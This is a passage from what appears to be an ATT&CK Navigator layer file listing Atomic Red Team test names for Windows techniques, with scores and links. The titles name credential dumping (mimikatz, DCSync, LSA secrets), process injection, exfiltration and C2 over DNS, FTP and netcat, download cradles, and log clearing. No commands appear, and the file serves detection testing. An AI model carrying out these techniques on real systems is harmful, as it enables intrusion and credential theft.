WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n- Create Volume Shadow Copy with diskshadow\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - 